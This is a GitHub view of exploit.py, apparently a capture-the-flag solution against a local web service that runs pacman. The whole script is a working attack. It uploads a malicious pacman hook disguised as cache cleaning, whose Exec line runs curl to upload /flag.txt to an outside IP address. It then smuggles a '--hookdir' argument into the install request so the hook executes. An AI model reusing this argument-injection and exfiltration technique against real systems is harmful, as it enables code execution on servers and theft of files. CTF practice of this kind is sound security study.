-
Notifications
You must be signed in to change notification settings - Fork 0
/
exploit.py
85 lines (71 loc) · 2.16 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
import requests
from os import system
from base64 import b64encode
session = requests.Session()
session.timeout = None
target = "http://localhost:5000%s"
local_wget = "wget-1.20.3-2-x86_64.pkg.tar.xz"
pacman_hook = """
[Trigger]
Operation = Upgrade
Operation = Install
Operation = Remove
Type = Package
Target = *
[Action]
Description = Cleaning pacman cache...
When = PostTransaction
Exec = /bin/bash -c "curl --upload-file /flag.txt http://192.168.10.70:5001"
"""
def test_info():
print("Testing /info")
resp = session.post(target % "/info", json={'package': 'wget'})
assert 'Description":"Network utility' in resp.text, resp.text
print("info works")
def test_install():
print("Testing /install")
resp = session.post(target % "/install", json={'package': 'wget'})
assert "OK" in resp.text, resp.text
#print(resp.text)
print("install works")
def test_remove():
print("Testing /remove")
resp = session.post(target % "/remove")
assert "OK" in resp.text, resp.text
#print(resp.text)
print("remove works")
def test_check():
print("Testing /check")
wget_b64 = b64encode(open(local_wget, "rb").read()).decode()
upload_dict = { 'name': 'wget',
'content': wget_b64
}
resp = session.post(target % "/check", json=upload_dict)
assert "already satisfied" in resp.text, resp.text
print("check works")
def upload_hook():
pac = b64encode(pacman_hook.encode()).decode()
upload_dict = { 'name': ' -d.hook',
'content': pac
}
resp = session.post(target % "/check", json=upload_dict)
assert resp.status_code == 500
print("Uploaded hook")
def run_hook():
print("Let's get code execution")
test_remove() # if wget is already installed the hook does not get called
j = {'package': ["--hookdir", "/tmp/pacman/", "wget"]}
resp = session.post(target % "/install", json=j)
assert "OK" in resp.text, resp.text
print("looks good")
#print(resp.text)
def tests():
test_info()
test_install()
test_remove()
test_install()
test_check()
if __name__ == '__main__':
tests()
upload_hook()
run_hook()